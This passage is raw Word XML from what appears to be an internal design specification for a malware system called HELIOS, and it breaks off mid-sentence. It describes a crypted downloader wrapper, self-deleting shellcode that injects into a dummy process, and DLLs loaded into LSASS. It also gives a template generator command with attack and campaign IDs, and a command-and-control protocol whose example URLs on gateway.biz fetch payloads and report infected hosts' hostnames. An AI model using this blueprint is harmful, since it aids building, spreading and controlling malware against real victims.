    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00CC5922">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">In the HELIOS source code, these icons may be appended in a very simple manner, essentially allowing support to be added for any number of documents. Icon packs may be updated as well. 8 Windows-style icons are loaded in each icon group. The icon groups are created as if they were originally assembled with the Visual Studio IDE. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001925E6" w:rsidRPr="009C7420" w:rsidRDefault="001925E6" w:rsidP="00CC5922">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">Just to clarify, the icon resources are stored in the CORE DLLs, not in the wrapper templates. The Wrapper template itself is just the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> downloader. Once the template is downloaded, the icon resources are appended into the PE file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00CC5922">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00CC5922">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="18" w:name="_Toc347394095"/>
      <w:r>
        <w:t>Self-deletion</w:t>
      </w:r>
      <w:bookmarkEnd w:id="18"/>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00CC5922">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00CC5922" w:rsidRPr="00CC5922" w:rsidRDefault="00CC5922" w:rsidP="00CC5922">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The PE utilizes a novel technique for self-deletion. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> used to perform this was written in x86 assembly. Once the program passes control to it, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> starts a dummy process. The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> then copies itself into the dummy process, through the use of non-standard API calls. Once the lock has been removed from the caller, the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>shellcode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> deletes the file and terminates itself. This technique will work on all Windows version, with any permission level. It is stable on both x86 and x64 OS builds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00FF20F8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:bookmarkStart w:id="19" w:name="_Toc347394096"/>
      <w:r>
        <w:t>Template Generator Parameters</w:t>
      </w:r>
      <w:bookmarkEnd w:id="19"/>
    </w:p>
    <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8"/>
    <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
      <w:r>
        <w:tab/>
        <w:t>The template generator will output an executable encoded with the following information: Attack ID, Campaign ID and Gateway list. Here is an example</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
      <w:r>
        <w:t>generator.exe -a 666 -w 777 -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> gateways.txt -o template.exe</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1638"/>
        <w:gridCol w:w="7938"/>
      </w:tblGrid>
      <w:tr w:rsidR="00FF20F8" w:rsidTr="00FF20F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRPr="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Parameter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRPr="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:pPr>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF20F8" w:rsidTr="00FF20F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>-a</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>Attack ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF20F8" w:rsidTr="00FF20F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>-w</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>Campaign ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF20F8" w:rsidTr="00FF20F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>-</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>i</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>Gateway list (following the same structure as the builder gate list)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00FF20F8" w:rsidTr="00FF20F8">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1638" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>-o</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8">
            <w:r>
              <w:t>Output template file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00FF20F8" w:rsidRPr="00FF20F8" w:rsidRDefault="00FF20F8" w:rsidP="00FF20F8"/>
    <w:p w:rsidR="009C7420" w:rsidRDefault="009C7420" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="20" w:name="_Toc347394097"/>
      <w:r>
        <w:t>HELIOS Gateway Protocol Specification</w:t>
      </w:r>
      <w:bookmarkEnd w:id="20"/>
    </w:p>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D30361" w:rsidRDefault="00D30361" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Communication with the gateway systems requires two different protocols, layered on top of HTTP. In summary, the communication with the gateways allows HELIOS to update Mercury payloads, to download newly </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> wrapper templates, to track </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00957528">
        <w:t xml:space="preserve"> and wrapper</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> infections, and to control HELIOS propagation.</w:t>
      </w:r>
      <w:r w:rsidR="00957528">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="00551FAB" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:tab/>
        <w:t xml:space="preserve">HELIOS does not propagate itself. Instead, each attack vector is crafted to drop the Mercury payload instead. Furthermore, HELIOS communicates with the gate system each time an attack is performed, to allow for controlled network coercion. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00551FAB" w:rsidRDefault="00551FAB" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">When </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is first initialized, it performs a standard gate communication [1] in order to obtain the newest Mercury payload. </w:t>
      </w:r>
      <w:r w:rsidR="00194349">
        <w:t xml:space="preserve">Once a successful attack has been made by </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00194349">
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00194349">
        <w:t>, another information URL is sent to the gates, informing them that a new client is about to be brought online [3].</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00194349" w:rsidRDefault="00194349" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">The wrapper functions in a similar manner, prioritizing the need for control, tracking and authentication. Once the Wrapper subroutine has been initialized, a request is made to download the newest template from the gates [2].  </w:t>
      </w:r>
      <w:r w:rsidR="00A3458C">
        <w:t>If a Wrapped file is executed, first a request is made to the gateways [4], to notify the gate of the host of the computer that generated the file.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="000A70A1" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="21" w:name="_Toc347394098"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> to</w:t>
      </w:r>
      <w:r w:rsidR="00957528">
        <w:t xml:space="preserve"> Gate Communication</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (Payload)</w:t>
      </w:r>
      <w:r w:rsidR="00551FAB">
        <w:t xml:space="preserve"> [1]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="21"/>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">When the CORE DLLs are loaded into LSASS memory, and once </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> has been initialized, an attempt will be made to communicate with the gateways specified in the builder URL list. Since the Mercury payload is not included in the HELIOS build, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> must contact the gates for it after initialization. Without any successful authentication from the gates, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> will fail to propagate. Here is an example of the standard payload request URL:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://gateway.</w:t>
      </w:r>
      <w:r w:rsidR="00601F49">
        <w:t>biz</w:t>
      </w:r>
      <w:r>
        <w:t>:8080/gate.php?&amp;a=666&amp;w=777&amp;f=mdrop</w:t>
      </w:r>
      <w:r w:rsidR="00601F49">
        <w:t>&amp;id=hostname</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="8388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00957528" w:rsidTr="00DF779C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRPr="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRPr="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FUNCTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00957528" w:rsidTr="00DF779C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Attack ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00957528" w:rsidTr="00DF779C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"w"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Campaign ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00957528" w:rsidTr="00DF779C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"f"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00957528" w:rsidRDefault="00DF779C" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the function, '</w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>mdrop</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t>', to drop the Mercury payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00601F49" w:rsidTr="00DF779C">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"id"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The hostname of the client machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00957528" w:rsidRDefault="00957528" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A320AF" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="22" w:name="_Toc347394099"/>
      <w:r>
        <w:t>Template Requests</w:t>
      </w:r>
      <w:r w:rsidR="00551FAB">
        <w:t xml:space="preserve"> [2]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="22"/>
    </w:p>
    <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Before the Wrapper can successfully install wrapped documents onto the USB, it requests a template from the gateways. The template is a PE skeleton, encoded with Corona campaign data and a list of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>WebDAV</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> servers, linking to the Mercury payload.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Each template is </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> panel-side, to prevent compromise of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> software. Furthermore, templates may be re-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>crypted</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> as per discretion of the user. If a new version of the </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>template has been pushed onto the gate system, the Wrapper will automatically update itself to utilize that template. Here is a sample request to the gate:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>http://gateway.biz:8080/gate.php?&amp;a=666&amp;w=777&amp;f=temp&amp;id=hostname</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1188"/>
        <w:gridCol w:w="8388"/>
      </w:tblGrid>
      <w:tr w:rsidR="00601F49" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRPr="00957528" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FIELD</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRPr="00957528" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:b/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
              </w:rPr>
              <w:t>FUNCTION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00601F49" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"a"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Attack ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00601F49" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"w"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the Campaign ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00601F49" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"f"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>Specifies the function, 'temp', to drop the Wrapper template</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00601F49" w:rsidTr="001E73AA">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1188" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>"id"</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8388" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
            <w:pPr>
              <w:jc w:val="both"/>
            </w:pPr>
            <w:r>
              <w:t>The hostname of the client machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00601F49" w:rsidRDefault="00601F49" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:bookmarkStart w:id="23" w:name="_Toc347394100"/>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Tracking</w:t>
      </w:r>
      <w:r w:rsidR="00551FAB">
        <w:t xml:space="preserve"> [3]</w:t>
      </w:r>
      <w:bookmarkEnd w:id="23"/>
    </w:p>
    <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D26817" w:rsidRDefault="00D26817" w:rsidP="00551FAB">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:tab/>
        <w:t xml:space="preserve">Since HELIOS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
        </w:rPr>
        <w:t>does not propagate itself</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, the payload that is executed on a remote machine, through the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nTM</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
